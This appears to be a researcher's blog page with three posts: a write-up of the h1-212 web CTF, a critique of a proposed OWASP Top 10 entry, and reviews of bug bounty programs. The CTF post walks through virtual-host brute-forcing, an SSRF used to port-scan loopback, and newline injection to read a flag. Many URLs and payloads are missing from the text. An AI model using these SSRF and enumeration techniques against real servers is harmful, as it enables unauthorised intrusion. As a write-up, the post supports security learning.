Wednesday 22 November 2017

h1-212 CTF Writeup


This is a writeup of h1-212; a web-based CTF by HackerOne. You can find the results and other writeups at last CTF I completed was for NULLCON way back in 2011 so I’m a tad rusty and this shouldn’t be taken as a how-to. Think of it more as a post-mortem. In order to make the solutions look a bit less like magic, I’ve intentionally included everything I attempted and the underlying thought process, regardless of whether it actually worked. This has predictably resulted in the post being horribly long, so you might want to grab a cup of tea before you begin.

To start, let’s take a look at the CTF introduction:
An engineer of launched a new server for a new admin panel at He is completely confident that the server can’t be hacked. He added a tripwire that notifies him when the flag file is read. He also noticed that the default Apache page is still there, but according to him that’s intentional and doesn’t hurt anyone. Your goal? Read the flag!

As expected, the only visible thing on was a taunting default Apache page, which didn’t even have any notable HTTP headers. A familiar and uninspiring sight for bug bounty hunters, it’s often impossible to know if these hide anything interesting.

Finding an entry point

Faced with a dull and surely well-tested piece of attack surface, I decided to hunt for some more interesting content. I launched a series of bruteforce attacks using Burp Intruder and the RAFT wordlists to enumerate supported file extensions, directories, HTML and PHP files. These found absolutely nothing.

While failing to find web content I also launched a full TCP portscan which revealed that SSH was accessible and had password-based authentication enabled, meaning that either I was expected to bruteforce the password, or the challenge creator simply hadn’t bothered to lock the server down. I correctly guessed that it was the latter and moved on.

By this point it was becoming apparent that bruteforcing was on everyone’s mind and the server started to buckle, causing some seriously extravagant response times. 20,000 requests later the file/folder bruteforce attempts had still found nothing, which only left one plausible explanation; the actual admin panel must be located on a non-default virtual host, meaning it would stay hidden until I supplied the correct Host header. The CTF introduction mentioned that the target company was, but simply supplying ‘’ didn’t work, so the virtual host must be a subdomain.  I didn’t have a subdomain wordlist handy, so I lazily re-used the RAFT directory one:

This worked perfectly, discovering ‘’:

Seeking valid input

The response contained the header ‘Set-Cookie: admin=no’ which is a transparent invitation to send ‘Cookie: admin=yes’. Attempting this resulted in a completely unexpected ‘Method not allowed’ response:

Fortunately, FuzzDB has a wordlist containing every conceivable HTTP method, so I was able to once again brute-force my way towards the flag:

Here we can see that the POST method generates a slightly different response from the others. At this point I got a bit confused and mistakenly decided this must be a server-level error caused by sending a POST request with no body. I tried to resolve this by specifying the Content-Length header without success, then wasted an extremely long five minutes staring at the screen trying to decide what insane custom HTTP header Jobert had thought up.

I then poked the server a bit and made a crucial observation: changing the value of the ‘admin’ cookie resulted in the 406 Not Acceptable response code disappearing:

Cookie: admin=yes
Content-Type: application/x-www-form-urlencoded
Content-Length: 9


HTTP/1.1 406 Not Acceptable
Date: Tue, 14 Nov 2017 21:17:20 GMT
Server: Apache/2.4.18 (Ubuntu)

Cookie: admin=blah
Content-Type: application/x-www-form-urlencoded
Content-Length: 9


HTTP/1.1 200 OK
Date: Tue, 14 Nov 2017 21:17:45 GMT
Server: Apache/2.4.18 (Ubuntu)

This behaviour indicated that the 406 status code was being generated by custom PHP code rather than Apache itself. This suggested that the application simply didn’t like the Content-Type of my request, and sure enough, changing it to application/json worked:

Cookie: admin=yes
Content-Type: application/json
Content-Length: 9


HTTP/1.1 418 I'm a teapot
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 37
Connection: close
Content-Type: application/json


From here, a series of seriously helpful (and sadly realistic) error messages guided me onward:

Response: {"error":{"domain":"incorrect value, .com domain expected"}}

Response:  {"error":{"domain":"incorrect value, sub domain should contain 212"}}

Finally, I had a valid input:

Response:  {"next":"\/read.php?id=1"}

Fetching /read.php?id=1 made the application send a HTTP request to the specified domain, and display the response base64 encoded.

Exploring capabilities

To fingerprint the client, I needed to make it issue a request to a server I could observe. This was problematic as none of,, and uh end in ‘.com’. Mercifully, it turned out that the application doesn’t validate the domain correctly, so you can fulfil the ‘.com domain’ requirement using the path:


This resulted in a surprisingly simple request hitting the collaborator:

GET / HTTP/1.0

The non-standard use of HTTP/1.0 with a Host header and absence of standard HTTP headers like ‘Connection’ imply that this request is being issued by custom code rather than a full-featured HTTP client like curl. This suggests that certain SSRF techniques like abusing redirects probably won’t work. During this process I also noticed that the HTTP request wasn’t sent until I hit the read.php page, which seemed slightly strange, but not particularly useful. This detail turned out to be extremely important later on.

At this point, although I’d found a serious vulnerability I still had no idea where the flag was.

One possibility was that the flag was hidden on the filesystem, and I was expected to find a way to use the SSRF to access local files via the file:/// protocol or perhaps a pseudo-protocol like php://filter. I was able to rule this out by confirming that even the http protocol didn’t work.

Another possibility was that the flag was embedded in the admin panel and only accessible by via the loopback interface. I found I could route requests to loopback using, but this request would be sent with a Host header of ‘’, meaning that it hit the default virtual host with its beloved default Apache page, rather than the administration panel. I initially attempted to bypass this using but the client didn’t support @.

Then I decided that as the HTTP client was so basic, it might be vulnerable to request header injection, letting me inject an extra host header of Unfortunately this attack failed too; the application simply failed to return a response when I submitted a new line. When I attempted this attack, I noticed that the corresponding ID number on /read.php incremented by 2 rather than one. This was actually another clue to a critical implementation detail, but at the time I assumed that someone had simply caught up with me in the CTF and disregarded it.

I decided to launch a fresh bruteforce attack, this time on the admin panel, and manually tackled the ‘id’ parameter while that ran. I found that although the input was strictly validated, supplying a high id resulted in a puzzling error: {"error":{"row":"incorrect row"}}

Once again, I disregarded this crucial clue to how the domain-fetch was being implemented, and continued my hunt.

I then checked back on my bruteforce, which had discovered /reset.php, a page that took no arguments and reset the read.php ID counter. Although this page was pretty much useless, its existence implied that the ID might be expected to reach very high numbers - something that would only happen if the SSRF was used in a bruteforce attack.

The obvious target for a bruteforce was localhost; there might be something exploitable bound to loopback like a convenient Redis database. Using the intruder with a list of the most popular 5000 tcp ports borrowed from nmap, I had a discovery on port 1337:


<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.10.3 (Ubuntu)</center>

A false solution

Figuring the flag was probably in the web root, I changed the payload to and received the message “Hmm, where would it be?”

Feeling quite accomplished at getting this far while everyone else was stuck near the start, I made the tactical error of prematurely reporting my progress to Jobert. He quickly grew suspicious of how fast I’d got there, and asked to see the payload I was using:

It turned out that using a ? to hit the root directory and avoid the 404 message was an unintentional bypass and the character was promptly blacklisted, leaving me stuck once again on the 404 page.


I initially tried to work around this by abusing PHP path entities and accessing /index.php/, but the server wasn’t running PHP. I then started to explore why the ID number incremented by two whenever the payload contained \n, and realised that the domains must be inserted into newline-delimited storage. This explained the ‘incorrect row’ error message from earlier. After that, grabbing the flag was simple:



In total this challenge took me two and a half hours to complete, and in spite of my many mistakes was still the first person to crack it. Taking part was a great experience, thanks to both the quality of the challenges and the atmosphere and banter supplied in ample by other participants. Thanks to everyone involved!

Monday 24 April 2017

Abusing OWASP with 'Insufficient Attack Protection'

I have no love for drama but over the last couple of years I’ve witnessed some shameless abuse of OWASP by commercial interests and feel it's important to call this out.

The latest draft of the OWASP TOP 10 ‘Most Critical Web Application Security Risks’ added a new entry at A7, titled ‘Insufficient Attack Protection’. It claims that failing to detect and respond to attacks is a critical risk.

This is a surprising and distinctly out of place addition to the top 10; every other entry is a serious vulnerability that poses a notable risk by itself, whereas failure to detect attacks is only hazardous when combined with a real vulnerability.

Furthermore, addressing any other entry in the top 10 provides a clear net positive to a webapp’s security posture, whereas complying with A7 can easily cause a net harm. Complying with A7 makes it extremely awkward to run an accessible bug bounty program, since it will hinder researchers trying to help you out. It also increases your attack surface (much like antivirus software) and introduces the risk of denial of service attacks by spoofing attacks from other users.

I’m not the only one in the community who thinks Insufficient Attack Protection has no place in the top 10 - a poll by @thornmaker found 80% of 110 respondents thought it should be removed.

At this point, you might be wondering where A7 came from. According to a contributer, it was "suggested by Contrast Security and *only* by Contrast Security".

I wonder why Contrast Security made this suggestion? Well, we can find a clue on their website - they’ve already started using A7 to flog ‘Contrast Protect’, their shiny attack protection solution:
A7: Insufficient Attack Protection. This new requirement means that applications need to detect, prevent, and respond to both manual and automated attacks. […] Contrast Protect effectively blocks attacks by injecting the protection directly into the application where it can take advantage of the full application context.

Still, perhaps I shouldn’t rush to assume Contrast Security is acting in bad faith and abusing the OWASP brand name to sell a product. It’s not like they’ve done anything like this before is it?

In 2015 Contrast/Aspect released a tool to evaluate vulnerability scanners dubbed “OWASP Benchmark”. This is much lower profile than the OWASP Top 10, but I work for a web scanner vendor myself so it caught my attention. Just like the new OWASP Top 10, there was something a bit odd about it - it ranked Contrast’s scanner vastly higher than all the competition, something they made sure to point out in marketing materials.

Here’s what Simon Bennets, the OWASP project leader for ZAP had to say:
Here we have a company that leads an OWASP project that just happens to show that their offering in this area appears to be _significantly_ better than any of the competition. Their recent press release stresses that its an OWASP project, make the most of the fact that the US DHS helped fund it but make no mention of their role in developing it.

Simon's post caused extensive discussion on the OWASP leaders mailing list, eventually leading to Jim Manico (an OWASP board member at the time) calling for the project to be demoted to 'incubator' status, in order to reflect the project's immaturity. The project is still in the incubator status. This hasn’t stopped Gartner from using it to compare scanning vendors, so I guess Contrast still got their money’s worth.

All in all I think it’s pretty clear why Insufficient Attack Protection has suddenly appeared. Perhaps the OWASP Top 10 should be demoted to incubator status too :-)

- albinowax

Thursday 11 August 2016

Reviewing bug bounties - a hacker's perspective

A prospective bug bounty hunter today has very little information on which to base his or her decision about which programs to participate in. There's a dramatic horror story every few months and that's about it. This is unfortunate because bounty hunting is founded on mutual trust; nobody wants to spend hours auditing a target only to find out that the client is disrespectful, incompetent, or likes to avoid paying out. I thought it might be helpful to write up reviews of the different bounty programs and platforms that I've dealt with.

You might be wondering exactly how much bug bounty hunting I've done in order to feel qualified to write this, particularly as I only bother writing up bounties if I consider them highly notable. I've been doing this in my spare time for roughly five years - my first bounty from Google was back in 2011 and I reported enough issues to star in their 0x0A list when it was first created in 2012. Over the years I've also reported a bunch of issues to Mozilla, a few of which are public (side note: the SQLi on is hilarious).  Other activity is visible on Hacker One, Cobalt, Bugcrowd, and in a few blog posts. I've received maybe 50 separate bounties in total. I view this as a decent sample.

I’ll try to provide the evidence and reasoning behind my conclusions, particularly when I had a poor experience with a program. Due to trust being critical to the bounty process, if my first experience with a bounty program was bad I would never use it again. So, if I give somewhere a bad review it’s always possible I was just unlucky. If you strongly agree or disagree with any of these reviews, do drop a comment or write up your own experience.

To keep things competitive, I’ve sorted the reviews by how good the overall experience is. Scroll down for the dirt.

Program Reviews


Google is consistently a pleasure to work with. They have a highly skilled, responsive and respectful security team, and offer healthy payouts. They also offer to double bounties if you donate them to charity, which is pretty cool. And they sometimes send shiny gifts to their top researchers, and there's the awesome party in Vegas... The only ‘downside’ is that these days, actually finding a decent vulnerability in one of their core products can be tricky relative to other targets.

We do have a disagreement about who bears responsibility for preventing CSV Injection attacks but they're going to change their minds soon so that's ok ;)
Uber (hackerone)
Uber is my current focus for bounty hunting because their scope is huge, they pay exceptionally well, and they don’t try to wriggle out of paying rewards. My last three bounties from Uber were $3000,  $7500 and $5000 for reflected and stored XSS respectively. As their bounty program is much younger than Google’s, it takes significantly less effort to find decent vulnerabilities in their websites.

Uber’s commitment to putting everything in scope is exceptional - Uber and Bugcrowd both use the same third party to host their documentation, and while Bugcrowd declared their documentation out of scope Uber worked with the third party to keep their documentation in scope. The somewhat amusing result is that if it wasn’t for Uber’s bug bounty program, it would be trivial to get administrative access to

That said, I’ve found their triage team a little frustrating at times. For example, I provided a detailed writeup clearly explaining how to replicate some reflected XSS, and they responded by asking me submit a video. I get the impression that they sometimes skim read reports and miss critical details such as “It's designed to work in Internet Explorer 11”.


Mozilla is interesting in that you often get to interact directly with the developers responsible for fixing your vulnerabilities, via bugzilla. This can be a blessing and a curse - it’s important to remember you can always summon the security team to mediate. I did have one bad experience with them early on - I reported a stored XSS bug where I couldn’t provide a poc due to a length limitation, and the developer fixed it within a few hours then argued it wasn’t a security issue. However, other times I’ve been paid $3k for vulnerabilities I thought were pretty lame - they certainly aren’t stingy with payouts.

Mozilla are another example of where diligent bounty scoping improves the security of the entire web ecosystem. While many bounty programs refuse to pay up for exploits in third party code, Mozilla happily pay for any exploits for the Django framework that you can replicate on, and everyone using Django is undoubtedly more secure as a result.

Another benefit of Mozilla is that if you request it, they’re happy to publicly disclose most bugs after they’ve been fixed. I view this as significantly better than being placed in a generic hall of fame, particularly if you’re early in your career - potential employers can see the technical details of your bugs. Overall I enjoy working with Mozilla even if the process isn’t always as slick as Google.


Shortly after their program opened, I reported CSRF via form-action-hijacking to them and got $1,000 on one of their highly 1337 debit cards for my troubles. It took quite a few emails before their security team fully understood the vulnerability, but they were cordial the whole time and the vulnerability is pretty esoteric so that’s understandable.


As you might expect from a free open source project the bounties aren’t massive - I got $242 for unauthenticated stored XSS - but they’re friendly and highly responsive. The main thing to beware of is that although they’ll give public credit, they prefer that critical vulnerability details aren’t disclosed even after patches have been released, to mitigate poor patch uptake.

I don't think this is a great policy, but it helps understand the context behind it. Piwik is the only program where I’ve personally seen clear evidence of black market interest in high quality exploits. I think this is because it’s deployable and widely used - you could probably get a foothold in all sorts of organisations with an exploit for it.

CodePen  (bugcrowd)

Codepen are the coolest program I’ve dealt with that doesn’t pay cash bounties. I got remote code execution on their site a few times, had a nice chat with them and they graciously agreed to let me disclose the full details at BlackHat USA last year.


I reported stored XSS on to them on April 20th, and they replied within 2 days but didn’t actually confirm it until June 6th which is pretty slow. The reward was $500 and I have yet to be paid but I have confidence it’ll arrive one of these months.

The most notable thing about Prezi’s program is that they  go to extraordinary lengths to prove that they aren’t cheating people by fraudulently marking issues as duplicates, using secret gists on github. It’s cool that they make this effort but I think it’s unnecessary really; if you view a company as dishonest you should stay well clear of their bounty program. There are plenty of other ways they can screw you over if they want to.

AwardWallet,, Zendesk, Informatica, WP-API, Fastmail, unnamed others

I’ve reported issues to them without issue or anything of note happening, other than Zendesk claiming the dubious achievement of awarding me the lowest non-zero bounty I've ever received for XSS - $50, with which I could just about buy lunch out after tax.

Cloudflare (hackerone)

Their program appears to be under-resourced. I reported an XSS to them on April 16th and they took over two weeks to first respond to it, and still have yet to fix it. This is sadly a frequent occurrence with programs that don’t pay cash bounties. Even if you’re bounty hunting for recognition rather than income, I’d recommend focusing on programs that pay a token cash bounty because at least you can be reasonably sure they take it seriously.  (bugcrowd)

I reported a fairly serious vulnerability to these guys and they fixed the issue and changed the status to resolved without saying a word. While I admire their efficiency, I've had better interactions with vending machines.


I reported a serious CSRF issue to Ebay several years ago and despite numerous emails back and forth, they failed to understand it. As far as I know the issue remains unpatched to this day.

Dropbox (hackerone)

Dropbox state that they pay $5000 for XSS, so when I reported a vulnerability that could be used to gain read/write access to users’ dropbox folders given a small amount of user interaction, I was a bit puzzled to get $0. The exploit is a bit unusual, so instead of trusting my reasoning you might want to take a look at the report and come to your own conclusion. I’m not surprised that they protested when I requested public disclosure of the issue. On the bright side, I found the vulnerability by accident so I only wasted about half an hour on them.

Western Union (bugcrowd)

Western Union appears to be a glaring exception to the concept that companies that pay cash bounties take their programs seriously.

I reported two vulnerabilities to them. Both were (in my professional opinion) fairly serious, and distinctly obvious. The first was marked as a duplicate of an issue reported over a year prior. Failing to patch an obvious vulnerability for over a year shows disrespect towards the numerous researchers who inevitably waste their time reporting it. The second received a $100 reward. When a company claims they pay $100-$5000 per vulnerability, I find it somewhat surprising to receive $100 for a bug that could probably be used to steal money.

Zomato (hackerone)
Zomato have provided my worst bounty experience so far. I generally have low expectations for commercial companies that don't pay cash bounties, but I was still surprised when they refused to reply to my issue, even after I used HackerOne's apparently ineffective 'request remediation' feature.

After 90 days I decided to publicly disclose the issue, only to discover they had silently patched it. I'm still waiting for them to reply to my submission, or mark it as resolved. Here's the entire thrilling report:

I wrote up the associated research over at

Platform Reviews

HackerOne platform

Of all the bug bounty platforms, HackerOne comes across as the best developed from a hacker’s perspective. I particularly appreciate the heavily integrated support for full disclosure and overall transparency. You can easily identify the payout range of many programs using publicly disclosed vulnerabilities, and spare yourself unpleasant surprises. The reputation/signal system also makes it stand out. Yet another cool hackerone feature I'd like to see in other platforms is that if the hacker requests it, vulnerabilities are automatically disclosed after a fixed time length without the company having to manually approve it.

One problem I've encountered on HackerOne is vendors not noticing reports. I had to use a personal contact to get WP-API to respond to a serious access control bypass, and an issue I reported to BitHunt 6 months ago still hasn't been replied to. I invoked HackerOne's 'request mediation' function on BitHunt and they failed to respond too. Inactive companies should really be clearly marked as such to prevent researchers wasting their time.

I’ve found companies that offer larger bounties are less likely to have this issue - sizeable rewards is a good indicator that the company is actually committed to the bounty program.

Cobalt platform

Cobalt (formerly crowdcurity) has a whole bunch of bitcoin related websites which are really fun to hack, although the bounties aren’t the biggest. Regardless of the bounty size, I like the warm fuzzy feeling of knowing I could have stolen a huge number of bitcoins if I felt like it. Unfortunately I can’t name the specific sites, but will be disclosing technical details of many of these vulnerabilities in my "Exploiting CORS Misconfigurations for Bitcoins and Bounties" presentation at OWASP AppSecUSA.

Cobalt's platform isn't dripping with as many features as HackerOne's but it does the job. It also lets hackers score bug bounty programs and provide feedback, which is frankly awesome - reputation shouldn't just apply to hackers. I don't know if this is directly related, but on the whole I've had good experiences with programs on Cobalt, and definitely recommend giving them a shout. The main thing to beware of is that payouts can take a while - someone found a race condition in the bitcoin withdrawal function and I think they're all manually reviewed now.

Bugcrowd platform
After a few poor experiences in a row with programs on Bugcrowd I mostly avoid them and therefore don't have much to say. I think they've been around the longest, and they don't deliver payments in bitcoins (subjecting all non-US users to Paypal’s awful exchange rates), but they evidently put effort into engaging with the community by presenting at conferences and releasing tools.

I’m sure there are good programs on there but I'll leave hunting them down to someone else.

About Payouts

Posts on bug bounties are frequently visited by commenters suggesting that the bug hunter could have got more cash by selling the vulnerability on ‘the black market’. My last payout was $5000 from Uber for an issue that took me six hours to find and write up. Do I feel shortchanged? No, and I wouldn’t have felt shortchanged with $500 either. I’m always happy to receive a large payout but I don’t feel entitled to it unless there’s a clear precedent. Could I have used that vulnerability to hijack a bunch of Uber developer accounts and cause well over $30k of carnage? Probably, but why would I want to do that? I honestly hope I won’t feel compelled to revisit this topic later. We’ll see.

That was it?

If you believe what some people write, you might conclude that every bug bounty program is out to exploit testers, wriggle out of paying rewards, pretend issues are duplicates and generally acting in bad faith. As you've hopefully gathered by reading this far, this does not reflect my own experience at all, and it would be a shame if this misconception put anyone off bounty hunting. The primary causes of drama seem to be broken expectations about payout size and program scope. Companies can mitigate these by writing clearly defined bounty briefings and encouraging publicly disclosed reports. Hackers can mitigate these by reading the briefs, using available information like publicly disclosed reports to set their expectations, and providing feedback on both good and bad experiences.

Hope that's helpful! Feel free to drop your own reviews in the comments or on your own site.